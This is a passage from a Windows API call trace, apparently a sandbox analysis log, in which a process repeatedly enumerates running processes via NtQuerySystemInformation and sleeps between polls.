Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.258] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.276] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.296] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.298] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.298] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.355] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.362] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.362] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.363] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.371] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.372] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.373] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.379] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.381] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.388] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.399] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.407] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.408] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.411] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.418] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.431] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.441] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.457] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0217.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0217.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0217.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.472] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0217.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0217.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0217.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 